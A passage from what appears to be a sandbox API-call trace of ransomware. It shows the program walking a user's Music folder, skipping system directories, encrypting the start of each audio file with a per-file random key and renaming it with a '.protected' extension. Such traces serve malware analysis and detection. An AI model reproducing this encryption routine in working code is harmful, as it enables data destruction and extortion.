HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav.protected") returned 93 [0092.287] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\93amr4.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\93AMr4.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\93amr4.wav.protected")) returned 1 [0092.288] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.288] lstrcmpiW (lpString1="DWkMZqzFQZj.mp3", lpString2="Windows") returned -1 [0092.288] lstrcmpiW (lpString1="DWkMZqzFQZj.mp3", lpString2="Program Files") returned -1 [0092.288] lstrcmpiW (lpString1="DWkMZqzFQZj.mp3", lpString2="Program Files (x86)") returned -1 [0092.288] lstrcmpiW (lpString1="DWkMZqzFQZj.mp3", lpString2="$Recycle.bin") returned 1 [0092.288] lstrcmpiW (lpString1="DWkMZqzFQZj.mp3", lpString2="System Volume Information") returned -1 [0092.288] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3") returned 88 [0092.288] StrStrIW (lpFirst="DWkMZqzFQZj.mp3", lpSrch=".protected") returned 0x0 [0092.288] lstrcmpW (lpString1="DWkMZqzFQZj.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.288] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.288] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.288] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dwkmzqzfqzj.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.288] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3") returned 88 [0092.288] StrStrW (lpFirst="DWkMZqzFQZj.mp3", lpSrch=".txt") returned 0x0 [0092.288] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3") returned 88 [0092.288] StrStrW (lpFirst="DWkMZqzFQZj.mp3", lpSrch=".rar") returned 0x0 [0092.288] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3") returned 88 [0092.288] StrStrW (lpFirst="DWkMZqzFQZj.mp3", lpSrch=".zip") returned 0x0 [0092.289] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.289] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, 
dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.289] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0092.289] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.289] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.289] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0092.289] CloseHandle (hObject=0xd8) returned 1 [0092.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3.protected") returned 98 [0092.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dwkmzqzfqzj.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DWkMZqzFQZj.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dwkmzqzfqzj.mp3.protected")) returned 1 [0092.290] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.290] lstrcmpiW (lpString1="DzM_NHkppokegVp5c4R", lpString2="Windows") returned -1 [0092.290] lstrcmpiW (lpString1="DzM_NHkppokegVp5c4R", lpString2="Program Files") returned -1 [0092.290] lstrcmpiW 
(lpString1="DzM_NHkppokegVp5c4R", lpString2="Program Files (x86)") returned -1 [0092.290] lstrcmpiW (lpString1="DzM_NHkppokegVp5c4R", lpString2="$Recycle.bin") returned 1 [0092.290] lstrcmpiW (lpString1="DzM_NHkppokegVp5c4R", lpString2="System Volume Information") returned -1 [0092.290] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R") returned 92 [0092.290] lstrcmpW (lpString1="DzM_NHkppokegVp5c4R", lpString2=".") returned 1 [0092.290] lstrcmpW (lpString1="DzM_NHkppokegVp5c4R", lpString2="..") returned 1 [0092.290] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\*") returned 94 [0092.290] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0092.291] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.291] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.291] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.291] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.291] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\.") returned 94 [0092.291] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.291] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.291] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.291] lstrcmpiW (lpString1="..", lpString2="Program Files") 
returned -1 [0092.291] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.291] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.291] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\..") returned 95 [0092.291] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.291] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.291] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.291] lstrcmpiW (lpString1="4MQ5ObmQYNUIotx0Cq.mp3", lpString2="Windows") returned -1 [0092.291] lstrcmpiW (lpString1="4MQ5ObmQYNUIotx0Cq.mp3", lpString2="Program Files") returned -1 [0092.291] lstrcmpiW (lpString1="4MQ5ObmQYNUIotx0Cq.mp3", lpString2="Program Files (x86)") returned -1 [0092.291] lstrcmpiW (lpString1="4MQ5ObmQYNUIotx0Cq.mp3", lpString2="$Recycle.bin") returned 1 [0092.291] lstrcmpiW (lpString1="4MQ5ObmQYNUIotx0Cq.mp3", lpString2="System Volume Information") returned -1 [0092.291] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3") returned 115 [0092.291] StrStrIW (lpFirst="4MQ5ObmQYNUIotx0Cq.mp3", lpSrch=".protected") returned 0x0 [0092.291] lstrcmpW (lpString1="4MQ5ObmQYNUIotx0Cq.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.291] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.291] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.291] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\4mq5obmqynuiotx0cq.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3") returned 115 [0092.292] StrStrW (lpFirst="4MQ5ObmQYNUIotx0Cq.mp3", lpSrch=".txt") returned 0x0 [0092.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3") returned 115 [0092.292] StrStrW (lpFirst="4MQ5ObmQYNUIotx0Cq.mp3", lpSrch=".rar") returned 0x0 [0092.292] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3") returned 115 [0092.292] StrStrW (lpFirst="4MQ5ObmQYNUIotx0Cq.mp3", lpSrch=".zip") returned 0x0 [0092.292] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.292] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.293] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.293] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.293] WriteFile 
(in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.293] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.293] CloseHandle (hObject=0x14c) returned 1 [0092.298] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3.protected") returned 125 [0092.298] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\4mq5obmqynuiotx0cq.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\4MQ5ObmQYNUIotx0Cq.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\4mq5obmqynuiotx0cq.mp3.protected")) returned 1 [0092.300] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.300] lstrcmpiW (lpString1="698coZeZh.wav", lpString2="Windows") returned -1 [0092.300] lstrcmpiW (lpString1="698coZeZh.wav", lpString2="Program Files") returned -1 [0092.300] lstrcmpiW (lpString1="698coZeZh.wav", lpString2="Program Files (x86)") returned -1 [0092.300] lstrcmpiW (lpString1="698coZeZh.wav", lpString2="$Recycle.bin") returned 1 [0092.300] lstrcmpiW (lpString1="698coZeZh.wav", lpString2="System Volume Information") returned -1 [0092.300] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav") returned 106 [0092.300] StrStrIW (lpFirst="698coZeZh.wav", lpSrch=".protected") returned 0x0 [0092.300] lstrcmpW (lpString1="698coZeZh.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.300] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.300] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.300] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\698cozezh.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.301] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav") returned 106 [0092.301] StrStrW (lpFirst="698coZeZh.wav", lpSrch=".txt") returned 0x0 [0092.301] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav") returned 106 [0092.301] StrStrW (lpFirst="698coZeZh.wav", lpSrch=".rar") returned 0x0 [0092.301] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav") returned 106 [0092.301] StrStrW (lpFirst="698coZeZh.wav", lpSrch=".zip") returned 0x0 [0092.301] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) 
returned 1 [0092.301] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.301] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.302] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.302] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.302] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.302] CloseHandle (hObject=0x14c) returned 1 [0092.302] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav.protected") returned 116 [0092.302] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\698cozezh.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\698coZeZh.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\698cozezh.wav.protected")) returned 1 [0092.303] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) 
returned 1 [0092.303] lstrcmpiW (lpString1="ATg-8CnAReIP.mp3", lpString2="Windows") returned -1 [0092.303] lstrcmpiW (lpString1="ATg-8CnAReIP.mp3", lpString2="Program Files") returned -1 [0092.303] lstrcmpiW (lpString1="ATg-8CnAReIP.mp3", lpString2="Program Files (x86)") returned -1 [0092.303] lstrcmpiW (lpString1="ATg-8CnAReIP.mp3", lpString2="$Recycle.bin") returned 1 [0092.303] lstrcmpiW (lpString1="ATg-8CnAReIP.mp3", lpString2="System Volume Information") returned -1 [0092.303] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3") returned 109 [0092.303] StrStrIW (lpFirst="ATg-8CnAReIP.mp3", lpSrch=".protected") returned 0x0 [0092.303] lstrcmpW (lpString1="ATg-8CnAReIP.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.303] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0092.303] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0092.303] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\atg-8cnareip.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0092.303] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3") returned 109 [0092.303] StrStrW (lpFirst="ATg-8CnAReIP.mp3", lpSrch=".txt") returned 0x0 [0092.303] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3") returned 109 [0092.303] StrStrW (lpFirst="ATg-8CnAReIP.mp3", lpSrch=".rar") returned 0x0 [0092.303] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3") returned 109 [0092.303] StrStrW (lpFirst="ATg-8CnAReIP.mp3", lpSrch=".zip") returned 0x0 [0092.303] ReadFile (in: hFile=0x14c, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.304] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.304] WriteFile (in: hFile=0x14c, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295ea24*=0x2800, lpOverlapped=0x0) returned 1 [0092.305] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.305] WriteFile (in: hFile=0x14c, lpBuffer=0x295e9fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x295e9fc*, lpNumberOfBytesWritten=0x295ea24*=0x4, lpOverlapped=0x0) returned 1 [0092.305] WriteFile (in: hFile=0x14c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ea24*=0x30, lpOverlapped=0x0) returned 1 [0092.305] CloseHandle (hObject=0x14c) returned 1 [0092.305] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3.protected") returned 119 [0092.305] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\atg-8cnareip.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\DzM_NHkppokegVp5c4R\\ATg-8CnAReIP.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\dzm_nhkppokegvp5c4r\\atg-8cnareip.mp3.protected")) returned 1 [0092.306] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0092.306] lstrcmpiW (lpString1="b4anS5I7R0HxUA.mp3", lpString2="Windows") returned -1 [0092.306] lstrcmpiW (lpString1="b4anS5I7R0HxUA.mp3", lpString2="Program Files") returned -1 [0092.306] lstrcmpiW (lpString1="b4anS5I7R0HxUA.mp3", lpString2="Program Files (x86)") returned -1 [0092.306] lstrcmpiW (lpString1="b4anS5I7R0HxUA.mp3", lpString2="$Recycle.bin") returned 1 [0092.306] lstrcmpiW (lpString1="b4anS5I7R0HxUA.mp3", lpString2="System Volume Information") returned -1 [0092.306] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: 